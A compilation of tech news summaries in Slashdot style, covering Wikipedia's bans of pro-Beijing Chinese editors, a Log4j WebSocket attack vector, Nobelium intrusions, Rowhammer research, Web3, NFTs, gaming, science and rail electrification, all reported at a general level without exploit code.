The Wikimedia Foundation banned seven high-level users in September and temporarily demoted a dozen others for abuses "unprecedented in scope and nature." Slashdot reader harrymcc explains: The foundation accused these volunteers of biasing it in favor of the Chinese government's viewpoint. This incident involves beatings, doxxings, and harassment designed to ensure pro-Beijing content.
harrymcc is also technology editor at Fast Company, which got more details from Wikimedia's VP of of Community Resilience & Sustainability, Maggie Dennis: Dennis said a monthlong investigation found that the veteran editors were "coordinating to bias the encyclopedia and bias positions of authority" around a pro-Beijing viewpoint, in part by meddling in administrator elections and threatening, and even physically assaulting, other volunteers...

Wikipedians in China have it especially hard, because the government blocks the site and makes accessing it a crime... But as with the dedicated mainland users of blocked apps like Instagram, Telegram, and Twitter, the prohibition hasn't deterred hundreds of volunteers, who tunnel through the Great Firewall with VPNs, and now make up a small but die-hard part of the Chinese Wikipedia community. Despite China's blockade, the site remains one of the ten most active language versions of Wikipedia, thanks largely to growing numbers of editors based in Taiwan and Hong Kong...

[A]mid acute worries over China's influence in both places, the community's mix of users and viewpoints has grown increasingly combustible. In 2014, when mainland editors were in the majority, there were few references to the Hong Kong protests; more recently, swarms of "pro Beijing" editors and "pro democracy" editors have battled over how exactly to depict those and simliar events. Were the students at a particular rally in Hong Kong protesters or were they rioters? Is a state-backed news outlet a reliable source?

In some cases, the Foundation found, the fights had spread beyond online harassment into real-life threats, and worse... Dennis says there is no evidence the banned editors were backed by the government...

[U]ntil September, the Foundation had only issued 86 bans since 2012, and typically only one at a time. Suddenly, the Foundation's bans and penalties had knocked out a third of the Chinese edition's administrators.
China "is home to the world's largest population of internet users and to the world's most sophisticated apparatus for policing them," the article notes.

It argues that the banned users "liked to defend Beijing's point of view, but they also liked their influence over the Wiki community; and a pro-China stance allowed them to more easily fly under the government's radar. To protect their fiefdom, they sometimes resorted to personal threats, harassment, and assault." Since the ban, they've now launched a "hard fork" of Chinese Wikipedia which already has 400,000 articles, "tailored to appease government censors so that anyone on the mainland can access it."

The article also explores the possibility of having one global version of Wikipedia, rather than separate local editions.

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants. Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. "

Gizmodo's David Nield explains what Web3 is, what it will mean for the future, and how exactly the third-generation internet differs from the first two. An anonymous reader shares an excerpt from his report: Let's cut to the chase: For Web3 evangelists, it's a revolution; for skeptics, it's an overhyped house of cards that doesn't stand up to much scrutiny. [...] As you might remember if you're of a certain age, Web 1.0 was the era of static webpages. Sites displayed news and information, and maybe you had your own little corner of the World Wide Web to show off your personal interests and hobbies. Images were discouraged -- they took up too much bandwidth -- and video was out of the question. With the dawn of the 21st century, Web 1.0 gave way to Web 2.0 -- a more dynamic, editable, user-driven internet. Static was out and webpages became more interactive and app-like (see Gmail, for example). Many of us signed up for social media accounts and blogs that we used to put our own content on the web in vast amounts. Images and video no longer reduced sites to a crawl, and we started sharing them in huge numbers. And now the dawn of Web3 is upon us. People define it in a few different ways, but at its core is the idea of decentralization, which we've seen with cryptocurrencies (key drivers of Web3). Rather than Google, Apple, Microsoft, Amazon, and Facebook (sorry, Meta) hoarding everything, the internet will supposedly become more democratized.

Key to this decentralization is blockchain technology, which creates publicly visible and verifiable ledgers of record that can be accessed by anyone, anywhere. The blockchain already underpins Bitcoin and other cryptocurrencies, as well as a number of fledging technologies, and it's tightly interwoven into the future vision of everything that Web3 promises. The idea is that everything you do, from shopping to social media, is handled through the sane secure processes, with both more privacy and more transparency baked in. In some ways, Web3 is a mix of the two eras that came before it: The advanced, dynamic, app-like tech of the modern web, combined with the decentralized, user-driven philosophy that was around at the start of the internet, before billion- and trillion-dollar corporations owned everything. Web3 shifts the power dynamic from the giant tech entities back to the users -- or at least that's the theory.

In its current form, Web3 rewards users with tokens, which will eventually be used in a variety of ways, including currency or as votes to influence the future of technology. In this brave new world, the value generated by the web will be shared out between many more users and more companies and more services, with much-improved interoperability. NFTs are closely linked to the Web3 vision. [...] For our purposes here, the link between cryptocurrencies, NFTs, and Web3 is the foundation: the blockchain. Throw in some artificial intelligence and some machine learning to do everything from filter out unnecessary data to spot security threats, and you've got just about every emerging digital technology covered with Web3. Right now Ethereum is the blockchain attracting the most Web3 interest (it supports both a cryptocurrency and an NFT system, and you can do everything from make a payment through it to build an app on it).

This year's Game Awards also saw the premiere of The Matrix Awakens, a new in-world "tech demonstrator" written by Lana Wachowski, the co-writer/director of the original Matrix trilogy and director of the upcoming sequel. It's available free on the PS5 and Xbox Series X/S, reports the Verge, and they also scored a sit-down video interview with Keanu Reeves and Carrie-Ann Moss about the new playable experience — and the new Matrix movie: Reeves also revealed that he thinks there should be a modern Matrix video game, that he's flattered by Cyberpunk 2077 players modding the game to have sex with his character, and why he thinks Facebook shouldn't co-opt the metaverse.

Apart from serving as a clever promotion vehicle for the new Matrix movie premiering December 22nd, The Matrix Awakens is designed to showcase what's possible with the next major version of Epic's Unreal Engine coming next year. It's structured as a scripted intro by Wachowski, followed by a playable car chase scene and then an open-world sandbox experience you can navigate as one of Epic's metahuman characters. A big reason for doing the demo is to demonstrate how Epic thinks its technology can be used to blend scripted storytelling with games and much more, according to Epic CTO Kim Libreri, who worked on the special effects for the original Matrix trilogy...

Everything in the virtual city is fully loaded no matter where your character is located (rather than rendered only when the character gets near), down to the detail of a chain link fence in an alley. All of the moving vehicles, people, and lighting in the city are generated by AI, the latter of which Libreri describes as a breakthrough that means lighting is no longer "this sort of niche art form." Thanks to updates coming to Unreal Engine, which powers everything from Fortnite to special effects in Disney's The Mandalorian, developers will be able to use the same, hyper-realistic virtual assets across different experiences. It's part of Epic's goal to help build the metaverse.
Elsewhere the site writes that The Matrix Awakens "single-handedly proves next-gen graphics are within reach of Sony and Microsoft's new game consoles." It's unlike any tech demo you've ever tried before. When we said the next generation of gaming didn't actually arrive with Xbox Series X and PS5, this is the kind of push that has the potential to turn that around....

Just don't expect it to make you question your reality — the uncanny valley is still alive and well.... But from a "is it time for photorealistic video game cities?" perspective, The Matrix Awakens is seriously convincing. It's head-and-shoulders above the most photorealistic video game cities we've seen so far, including those in the Spider-Man, Grand Theft Auto and Watch Dogs series... Despite glitches and an occasionally choppy framerate, The Matrix Awakens city feels more real, thanks to Unreal Engine's incredible global illumination and real-time raytracing ("The entire world is lit by only the sun, sky and emissive materials on meshes," claims Epic), the detail of the procedurally generated buildings, and how dense it all is in terms of cars and foot traffic.

And the most convincing part is that it's not just a scripted sequence running in real-time on your PS5 or Xbox like practically every other tech demo you've seen — you get to run, drive, and fly through it, manipulate the angle of the sun, turn on filters, and dive into a full photo mode, as soon as the scripted and on-rails shooter parts of the demo are done. Not that there's a lot to do in The Matrix Awakens except finding different ways to take in the view. You can't land on buildings, there's no car chases except for the scripted one, no bullets to dodge. You can crash any one of the game's 38,146 drivable cars into any of the other cars or walls, I guess. I did a bunch of that before I got bored, though, just taking in the world.... Almost 10 million unique and duplicated assets were created to make the city....

Epic Games' pitch is that Unreal Engine 5 developers can do this or better with its ready-made tools at their disposal, and I can't wait to see them try.

An anonymous reader quotes a report from Ars Technica: The detonation of the first nuclear bombs over Hiroshima and Nagasaki in August 1945 is seared into our collective memory, and the world has been haunted by the prospect of a devastating nuclear apocalypse ever since. Less well-known but equally significant from a nuclear arms race standpoint was the Soviet Union's successful detonation of a hydrogen "superbomb" in the wee hours of October 30, 1961. Dubbed "Tsar Bomba" (loosely translated, "Emperor of Bombs"), it was the size of a small school bus -- it wouldn't even fit inside a bomber and had to be slung below the belly of the plane. The 60,000-pound (27 metric tons) test bomb's explosive yield was 50 million tons (50 megatons) of TNT, although the design had a maximum explosive yield of 100 million tons (100 megatons).

The US had conducted the first successful test of a hydrogen bomb (codename: Ivy Mike) in 1954 and had been pondering the development of even more powerful hydrogen superbombs. But the Soviets' successful test lent greater urgency to the matter. Ultimately, President John F. Kennedy opted for diplomacy, signing the Partial Nuclear Test Ban Treaty on October 7, 1963. But US nuclear policy -- and, hence, world history -- might have ended up looking very different, according to Alex Wellerstein, a historian of science at the Stevens Institute of Technology in New Jersey and author of Restricted Data: The History of Nuclear Secrecy in the United States, released earlier this year. He also maintains the NUKEMAP, an interactive tool that enables users to model the impact of various types of nuclear weapons on the geographical location of their choice.

Wellerstein has analyzed recently declassified documents pertaining to the US response to Tsar Bomba during the Kennedy administration. He described his conclusions in a fascinating article recently published in the Bulletin of the Atomic Scientists, coinciding with the 60th anniversary of the test. [...] According to Wellerstein, the US initially sought to minimize the significance of the Soviets' success, officially dismissing it as a political publicity stunt with little to no technical or strategic importance. But the declassified files revealed that, behind the scenes, US officials took the matter very seriously indeed. Physicist Edward Teller in particular strongly advocated in favor of developing two even more powerful hydrogen bombs, with yields of 1,000 and even 10,000 megatons, respectively. While much of Teller's testimony at a secret meeting on the topic remains classified, Wellerstein found that many scientists who were present expressed shock at his proposal. Concerns about the practical use of such a massive weapon, particularly the widespread nuclear fallout, ultimately scuttled those plans. "I found the new information with regard to the US response to Tsar Bomba really interesting, because it contradicts what they said in public versus what was going on behind the scenes," says Wellerstein. "A lot of the discussions about the Tsar Bomba in American writing essentially parrot then-President Kennedy's line without realizing it: 'Oh, these bombs are worthless. No, they can't do it.' But it's clear that there were people within the Kennedy administration who didn't think it was as simple as that. We can be happy that those people didn't win out."

He added: "There is always this temptation for big bombs. I found a memo by somebody at Sandia, talking about meeting with the military. He said that the military didn't really know what they wanted these big bombs for, but they figured that if the Soviets thought they were a good idea, then the US should have one, too. It's reminiscent of that line from Dr. Strangelove."

Ars Technica sat down with Wellerstein to learn more about the Tsar Bomba test. You can read the full article here.

An anonymous reader quotes a report from Motherboard: Wikipedia co-founder Jimmy Wales' auction of an NFT and the iMac he used to build the website has stirred up drama in the notoriously rigid Wikipedia community. The trouble began when Wales posted an announcement about the auction on his user talk page -- a kind of message board where users communicate directly with each other. Wikipedia has strict rules against self-promotion and some editors felt that Wales' announcement violated that rule. "Am I crazy? Jimbo has posted a thread on his user talk page promoting an auction of some of his stuff, which he has refused to confirm would not benefit him personally," editor Floquenbeam said on December 3.. "This is self-promotion 101, right? I've told him if he doesn't remove it, I will. That's policy, right? [...] Wales pushed back, saying he'd spoken to the WMF communications and legal departments and that they'd agreed a simple post about the auction on his user talk page would be fine.

The conversation went on like this for about a day before another editor shut it down, saying it was "past the point of productive discourse." The thread announcing the auction on Wales' talk page was removed but another thread remains where he's answering questions about the auction and NFTs from other users. An email thread on the Wikimedia-L listserv is more measured but still has some pedantic arguments that is common with Wikimedia drama. Some users are concerned that he's taking something from Wikimedia and could use the money to fund his commercial enterprise WT:Social. Another user said "The concept of NFT seems to go against the very principles of Wikipedia. On one hand, we share our work freely, both in terms of access and by using a copyleft license. On the other hand, this NFT takes something that was shared freely and then restricts it so that it can be sold." The NFT Wales is selling is a website that allows users to relive the moment of Wikipedia's creation. The site looks like Wikipedia did in its fledgling moments, and whoever wins the auction can edit it as they will.

The second big controversy among Wikipedia's editors was whether Wales had the right to auction off something like this and if he was even recreating the site correctly at the moment of its inception. The discussion devolved into a lengthy conversation about who owns the rights to what they edit on Wikipedia and the state of servers and timestamps from 2001. It's worth mentioning here that Wales' NFT is a recreation of a memory and not an actual editable bit of code that will be reflected on Wikipedia in any way. Eventually, all sides relented. "There is at least one good thing that should be coming out of this," editor Smallbones said. "The community has made it very clear that anything that is considered to be promotional or an advertisement, even if it is for a charitable cause, on any page in Wikipedia, posted by any editor -- even the most senior and most respected -- may be removed by any editor at any time."

fahrbot-bot shares a report from ScienceAlert: Usage of the medication sildenafil -- better known to most as the brand-name drug Viagra -- is associated with dramatically reduced incidence of Alzheimer's disease, new research suggests. According to a study led by researchers at the Cleveland Clinic, taking sildenafil is tied to a nearly 70 percent lower risk of developing Alzheimer's compared to non-users. That's based on an analysis of health insurance claim data from over 7.2 million people, in which records showed that claimants who took the medication were much less likely to develop Alzheimer's over the next six years of follow up, compared to matched control patients who didn't use sildenafil.

It's important to note that observed associations like this -- even on a huge scale -- are not the same as proof of a causative effect. For example, it's possible that the people in the cohort who took sildenafil might have something else to thank for their improved chances of not developing Alzheimer's. Nonetheless, the researchers say the correlation shown here -- in addition to other indicators in the study -- is enough to identify sildenafil as a promising candidate drug for Alzheimer's disease, the viability of which can be explored in future randomized clinical trials designed to test whether causality does indeed exist.

An anonymous reader quotes a report from Ars Technica: Almost exactly a year ago, security researchers uncovered one of the worst data breaches in modern history, if not ever: a Kremlin-backed hacking campaign that compromised the servers of network management provider SolarWinds and, from there, the networks of 100 of its highest-profile customers, including nine US federal agencies. Nobelium -- the name Microsoft gave to the intruders -- was eventually expelled, but the group never gave up and arguably has only become more brazen and adept at hacking large numbers of targets in a single stroke. The latest reminder of the group's proficiency comes from security firm Mandiant, which on Monday published research detailing Nobelium's numerous feats -- and a few mistakes -- as it continued to breach the networks of some of its highest-value targets.

Mandiant's report shows that Nobelium's ingenuity hasn't wavered. Since last year, company researchers say the two hacking groups linked to the SolarWinds hack -- one called UNC3004 and the other UNC2652 -- have continued to devise new ways to compromise large numbers of targets in an efficient manner. Instead of poisoning the supply chain of SolarWinds, the groups compromised the networks of cloud solution providers and managed service providers, or CSPs, which are outsourced third-party companies that many large companies rely on for a wide range of IT services. The hackers then found clever ways to use those compromised providers to intrude upon their customers. The advanced tradecraft didn't stop there. According to Mandiant, other advanced tactics and ingenuities included:

• Use of credentials stolen by financially motivated hackers using malware such as Cryptbot (PDF), an information stealer that harvests system and web browser credentials and cryptocurrency wallets. The assistance from these hackers allowed the UNC3004 and UNC2652 to compromise targets even when they didn't use a hacked service provider.
• Once the hacker groups were inside a network, they compromised enterprise spam filters or other software with "application impersonation privileges," which have the ability to access email or other types of data from any other account in the compromised network. Hacking this single account saved the hassle of having to break into each account individually.
• The abuse of legitimate residential proxy services or geo-located cloud providers such as Azure to connect to end targets. When admins of the hacked companies reviewed access logs, they saw connections coming from local ISPs with good reputations or cloud providers that were in the same geography as the companies. This helped disguise the intrusions, since nation-sponsored hackers frequently use dedicated IP addresses that arouse suspicions.
• Clever ways to bypass security restrictions, such as extracting virtual machines to determine internal routing configurations of the networks they wanted to hack.
• Gaining access to an active directory stored in a target's Azure account and using this all-powerful administration tool to steal cryptographic keys that would generate tokens that could bypass two-factor authentication protections. This technique gave the intruders what's known as a Golden SAML, which is akin to a skeleton key that unlocks every service that uses the Security Assertion Markup Language, which is the protocol that makes single sign-on, 2FA, and other security mechanisms work.
• Use of a custom downloader dubbed Ceeloader.

For their fifteenth International Day Against DRM this Friday, the Free Software Foundation's "Defective by Design" campaign is "calling on you to help us send a message to purveyors of Digital Restrictions Management (DRM)".

And this year they're targeting Disney+ The ongoing pandemic has only tightened the stranglehold streaming services have as some of the most dominant forms of entertainment media, and Disney+ is among the worst of them. After years of aggressive lobbying to extend the length of copyright, based on their perceived need to keep a certain rat from entering the public domain, they've now set their sights on "protecting" their various franchises in a different way: by shackling them with digital restrictions. If Disney's stated mission is to keep "inspiring hope and sparking the curiosity of all ages", using DRM to limit that curiosity remains the wrong move.

This year, we'll be using one of Disney's own means of spreading their "service" and the DRM bundled with it: their mobile app. If you're an existing user of the Google Play (Android) or Apple App Stores, you can support the International Day Against DRM by voicing your objection to Disney's subjugation of their users. Streaming services like Netflix and Peacock have the same issues, but by targeting a newer one with such massive investment and capital behind it, we can make sure that we're heard. Disney+ is new: that gives it time to change.

Disney+ is placed near the top of the most frequently downloaded apps on both the Google Play and Apple App Stores. We invite you to write a well-thought objection to Disney's use of DRM, with a fitting review. It is the perfect way to let the corporation, and other users intending to use its services know Disney's grievous mistake in using DRM to restrict customers who already want to view their many films and television shows. It will give you a chance to give them the exact rating that any service that treats its users so poorly: a single star.

DRM isn't the only problem with the Disney+ app. It's also nonfree software. If you're not already an Android or iOS user, we don't recommend starting an account just to participate in this action. You can also choose to send an email to Disney executives following our template.
They're urging supporters to also share the actions they've taken on social media using the tag #DayAgainstDRM. (And there's also an IRC channel "to discuss and share strategies for anti-DRM activism," with more anti-DRM actions still to come.

"While some aspects of the struggle have changed, the core principles remain the same: users should not be forced to surrender their digital autonomy in exchange for media."

Wikipedia co-founder Jimmy Wales is selling a non-fungible token (or NFT) based on his first edit of the free encyclopedia. From a report: Auction house Christie's will hold a sale of the token from December 3rd to 15th, auctioning it alongside the Strawberry iMac Wales was using around Wikipedia's launch. The funds will go toward charitable causes and WT.Social, a donation-backed social network that Wales launched in 2019. Wales' NFT is effectively the keys to a very early version of Wikipedia, which debuted in January of 2001.

"What you see displayed is what Wikipedia looked like at the moment that I set up the software," he tells The Verge. The single page will be launched publicly on the web, and much like Wikipedia itself, anyone will be able to see and edit it. But all changes will revert after five minutes, returning it to its original state: a single edit reading "Hello, World!" following a long-held tradition of programming. The NFT, which is written to the Ethereum blockchain, encodes a smart contract that grants its buyer control over that website. The buyer can change the window for reverting edits, and if they really want, they can turn off editing or shut down the page. They can also take a completely hands-off approach and let Wales manage the page for them.

schwit1 shares a report from ScienceAlert: The comet Bernardinelli-Bernstein (BB) -- the largest our telescopes have ever spotted -- is on a journey from the outer reaches of our Solar System that will see it flying relatively close to Saturn's orbit. Now, a new analysis of the data we've collected on BB has revealed something rather surprising. Digging into readings logged by the Transient Exoplanet Survey Satellite (TESS) between 2018 and 2020, researchers have discovered that BB became active much earlier, and much farther out from the Sun, than was previously thought.

A comet becomes active when light from the Sun heats its icy surface, turning ice to vapor and releasing trapped dust and grit. The resulting haze, called a coma, can be useful for astronomers in working out exactly what a particular comet is made out of. In the case of BB, it's still too far out for water to sublimate. Based on studies of comets at similar distances, it's likely that the emerging fog is driven instead by a slow release of carbon monoxide. Only one active comet has previously been directly observed at a greater distance from the Sun, and it was much smaller than BB. "These observations are pushing the distances for active comets dramatically farther than we have previously known," says astronomer Tony Farnham, from the University of Maryland (UMD). "We make the assumption that comet BB was probably active even farther out, but we just didn't see it before this. What we don't know yet is if there's some cut-off point where we can start to see these things in cold storage before they become active."

The research has been published in the Planetary Science Journal.

How many members of your team are so irreplaceable that if they were hit by a bus, your project would grind to a halt?

For PHP, that number is: two. (According to a post by PHP contributor Joe Watkins earlier this year that's now being cited in Mike Melanson's "This Week in Programming" column.) "Maybe as few as two people would have to wake up this morning and decide they want to do something different with their lives in order for the PHP project to lack the expertise and resources to move it forward in its current form, and at current pace," Watkins wrote at the time, naming Dmitry Stogov and Nikita Popov as those two. Well, last week, Nikita Popov was thankfully not hit by a bus, but he did decide to move on from his role with PHP to instead focus his activities on LLVM.

Also thankfully, Watkins' article earlier this year opened some eyes to the situation at hand and, as he writes in a follow-up article this week, JetBrains (Popov's employer) reached out to him at the time regarding starting a PHP Foundation. This week, with Popov's departure, the PHP Foundation was officially launched with the goal of funding part/full-time developers to work on the PHP core in 2022. At launch, the PHP Foundation will count 10 companies — Automattic, Laravel, Acquia, Zend, Private Packagist, Symfony, Craft CMS, Tideways, PrestaShop, and JetBrains — among its backers, with an expectation to raise $300,000 per year, and with JetBrains contributing $100,000 annually. Alongside that, the foundation is being launched using foundation-as-a-service provider Open Collective, and just under 700 contributors have already raised more than $40,000 for the foundation.

One of the key benefits to creating a foundation, rather than sticking with the status quo, goes beyond increasing the bus factor — it diversifies the influences on PHP. Watkins points out that, for much of the history of PHP, Zend, the employer of Dmitry Stogov, has been a primary financial backer, and as such has had some amount of influence on the language's direction. Similarly, JetBrains had increased influence during its time employing Popov on PHP."To say they have not influenced the direction of the language as a whole would just not be true...." While Watkins says that everything has been above board and gone through standard processes to ensure so, influence is nonetheless indisputable, and that "The Foundation represents a new way to push the language forward..."

The current RFC process, JetBrains writes, "will not change, and language decisions will always be left to the PHP Internals community."
And in addition, Watkins adds, "It provides us the mechanism by which to raise the bus factor, so that we never face the problems we face today, and have faced in the past."

IEEE Spectrum reports on the progress being made to develop a "smart artificial pancreas" that senses blood glucose and administers insulin accordingly. An anonymous reader shares an excerpt from the report: The artificial pancreas is finally at hand. This is a machine that senses any change in blood glucose and directs a pump to administer either more or less insulin, a task that may be compared to the way a thermostat coupled to an HVAC system controls the temperature of a house. All commercial artificial pancreas systems are still "hybrid," meaning that users are required to estimate the carbohydrates in a meal they're about to consume and thus assist the system with glucose control. Nevertheless, the artificial pancreas is a triumph of biotechnology.

It is a triumph of hope, as well. We well remember a morning in late December of 2005, when experts in diabetes technology and bioengineering gathered in the Lister Hill Auditorium at the National Institutes of Health in Bethesda, Md. By that point, existing technology enabled people with diabetes to track their blood glucose levels and use those readings to estimate the amount of insulin they needed. The problem was how to remove human intervention from the equation. A distinguished scientist took the podium and explained that biology's glucose-regulation mechanism was far too complex to be artificially replicated. [Boris Kovatchev, a scientist at the University of Virginia, director of the UVA Center for Diabetes Technology, and a principal investigator of the JDRF Artificial Pancreas Project] and his colleagues disagreed, and after 14 years of work they were able to prove the scientist wrong.

It was yet another confirmation of Arthur Clarke's First Law: "When a distinguished but elderly scientist states that something is possible, he is almost certainly right. When he states that something is impossible, he is very probably wrong." [...] Progress toward better automatic control will be gradual; we anticipate a smooth transition from hybrid to full autonomy, when the patient never intervenes. Work is underway on using faster-acting insulins that are now in clinical trials. Perhaps one day it will make sense to implant the artificial pancreas within the abdominal cavity, where the insulin can be fed directly into the bloodstream, for still faster action. What comes next? Well, what else seems impossible today?

Long-time Slashdot reader destinyland writes: This week Marvel released an epic three-minute trailer hyping December's releases of Spider-Man: No Way Home. "It comes after the initial trailer, which focused on the movie's multiversal villains, broke YouTube records over the summer," CNET reported Tuesday (racking up 355.5 million views in its first 24 hours).

But then one more universe collided...

Basically, some internet wise guys re-edited the trailer, splicing its audio over clips from the Fox Kids' 1994 cartoon series Spider-Man. (Opening credits here.) "This has no right being this good," argues CNET — especially since the actual movie's trailer arrived "amidst a ludicrous amount of fanfare and hype."

But it's all oddly appropriate, since CNET notes the upcoming movie features five sinister villains from nearly 20 years of Spider-Man movies, reaching back to the Tobey Maguire and Andrew Garfield era ("likely spurred on by the events of the Disney Plus Loki series.")

So maybe it's fitting that it was also invaded by the television cartoon universe...

DevNull127 writes: Saturday afternoon, 91 geeks huddled around a Twitch stream to hear the winners announced for the 27th Annual Interactive Fiction Competition. This year's competition attracted 71 entries, and $10,396 was raised for a cash-prize fund (which is divided among all the game authors whose entries ranked in the top two-thirds, with the first-place finisher receiving a prize in the hundreds of dollars and the last entry in the top two-thirds receiving $10). But there's also a long list of fun non-cash prizes available in a "prize pool," and starting with the author of the first-place game, authors take their turn choosing. (Prizes included everything from 0.055 in Ethereum cryptocurrency to the conversion of your text adventure into a professionally-produced audiobook.)

After a six-week period where the general public played and voted on the 71 games, the first-place winner was chosen. It had a strange title — "And Then You Come to a House Not Unlike the Previous One." Its welcome screen jokingly promises "the latest in ASCII graphic technology to occasionally write high-res, text-based images directly onto a screen that is eighty characters wide or more..." In this text adventure game you play a teenager who starts out....playing a text adventure game (called "THE GLUTTONOUS ELF: Adventure #1"), with the game itself ultimately offering a kind of meta-commentary on the world of text adventures over the years.

Perhaps not surprisingly, this game also won a second award — the contest's special prize for the entry most-liked by the other games' authors who'd entered this year's competition.

This year's runner-up was "Dr Horror's House of Terror". It's not to be confused with the Christopher Lee/Peter Cushing movie with a similar name — except perhaps with some playful and intentional overlap which becomes apparent as the game progresses.

And a splendid time was had by all.

This week Mike Bouma (Slashdot reader #85,252) looked back nearly 30 years to the glory days of the world's first true 32-bit CD based home console — Commodore's Amiga32. In the final three months of 1993, the company had sold 100,000 in just three months in Europe, outselling Sega four to one, "and claiming 38% market share of all CD ROM drives sold in the U.K. (according to the Gallup Weekly Report)."

But the next year all over, Mike Bouma writes, summarizing reports from both Amiga Report and Wikipedia: Operations in Germany and the United Kingdom were still profitable, but Commodore was not able to meet demand for new units because of component supply problems — and could not release the (already made) Amiga CD32 stock in the United States due to a legal patent issue!

Commodore declared bankruptcy on April 29, 1994, causing the CD32 to be discontinued only eight months after its debut.
This look back was apparently inspired by a report from retro gaming vlogger Lady Decade about what then happened to the Amiga CD32 after Commodore's demise — and about the system that would've been its successor: the lost Amiga64.

Earlier this week Mike shared the news that attempts to make a 'Doom' clone for the Amiga 500 have already led to a demo map (for both Amiga 500s with one megabyte of RAM and Atari STs with two megabytes of RAM).

And for more vintage retro-gaming goodness, Mike adds that "In my opinion the most impressive game released for the system was Super Stardust by Bloodhouse, published by Team17." It was the sequel to Stardust for the Amiga 500 and Atari STE. Bloodhouse merged with Terramarque (famous for their impressive Amiga 500 game Elfmania) to form Housemarque, which is still making games as of today.

"An unprivileged application can corrupt data in memory by accessing 'hammering' rows of DDR4 memory in certain patterns millions of times a second, giving those untrusted applications nearly unfettered system privileges," writes long-time Slashdot reader shoor. Ars Technica reports: Rowhammer attacks work by accessing -- or hammering -- physical rows inside vulnerable chips millions of times per second in ways that cause bits in neighboring rows to flip, meaning 1s turn to 0s and vice versa. Researchers have shown the attacks can be used to give untrusted applications nearly unfettered system privileges, bypass security sandboxes designed to keep malicious code from accessing sensitive operating system resources, and root or infect Android devices, among other things. All previous Rowhammer attacks have hammered rows with uniform patterns, such as single-sided, double-sided, or n-sided. In all three cases, these "aggressor" rows -- meaning those that cause bitflips in nearby "victim" rows -- are accessed the same number of times.

Research published on Monday presented a new Rowhammer technique. It uses non-uniform patterns that access two or more aggressor rows with different frequencies. The result: all 40 of the randomly selected DIMMs in a test pool experienced bitflips, up from 13 out of 42 chips tested in previous work (PDF) from the same researchers. "We found that by creating special memory access patterns we can bypass all mitigations that are deployed inside DRAM," Kaveh Razavi and Patrick Jattke, two of the research authors, wrote in an email. "This increases the number of devices that can potentially be hacked with known attacks to 80 percent, according to our analysis. These issues cannot be patched due to their hardware nature and will remain with us for many years to come."

The non-uniform patterns work against Target Row Refresh. Abbreviated as TRR, the mitigation works differently from vendor to vendor but generally tracks the number of times a row is accessed and recharges neighboring victim rows when there are signs of abuse. The neutering of this defense puts further pressure on chipmakers to mitigate a class of attacks that many people thought more recent types of memory chips were resistant to. In Monday's paper, the researchers wrote: "Proprietary, undocumented in-DRAM TRR is currently the only mitigation that stands between Rowhammer and attackers exploiting it in various scenarios such as browsers, mobile phones, the cloud, and even over the network. In this paper, we show how deviations from known uniform Rowhammer access patterns allow attackers to flip bits on all 40 recently-acquired DDR4 DIMMs, 2.6x more than the state of the art. The effectiveness of these new non-uniform patterns in bypassing TRR highlights the need for a more principled approach to address Rowhammer." While PCs, laptops, and mobile phones are most affected by the new findings, the report notes that cloud services like AWS and Azure "remain largely safe from Rowhammer because they use higher-end chips that include a defense known as ECC, short for Error Correcting Code."

"Concluding, our work confirms that the DRAM vendors' claims about Rowhammer protections are false and lure you into a false sense of security," the researchers wrote. "All currently deployed mitigations are insufficient to fully protect against Rowhammer. Our novel patterns show that attackers can more easily exploit systems than previously assumed."

Research studying the possibility of electrifying rail-based freight "finds that the technology is pretty much ready," reports Ars Technica, "and under the right circumstances, the economics are on the verge of working out."

It helps that the price of batteries have dropped 87% over the last decade: In the U.S., the typical freight car travels an average of 241 kilometers per day when in operation. So the researchers created a battery big enough to move that distance as part of a large freight train (four locomotives, 100 freight cars, and about 7,000 tonnes of payload). They found that lithium ferrous phosphate would let each of the four locomotives be serviced by a single freight car configured as a giant battery. The battery would only occupy 40 percent of the volume of a typical boxcar and would be seven tonnes below the weight limit imposed by existing bridges. Because of the efficiency of direct electric power, the train would use only half the energy consumed by an internal combustion engine driving an on-board generator...

Using an economic measure called the "net present value," the researchers determine that switching to batteries alone would cost $15 billion. But taking the pollution damages into account turns the number into a $44 billion savings. Considering climate damages as well boosts the savings to $94 billion. Even if these damages are ignored, a rise in the price of diesel and allowing freight companies to buy power at wholesale rates come close to shifting the costs to neutral... [F]reight companies could use their capacity to provide grid stabilization services or sell back power when the price gets high. In extreme cases, this system could actually pay for the entire infrastructure.

"Preliminary estimates of the most expensive 90 hours per year in the ERCOT [Texas] market, for example, show that batteries could be discharged at $200/kWh, potentially generating enough revenue to pay for the upfront battery cost in a single year," the study says.
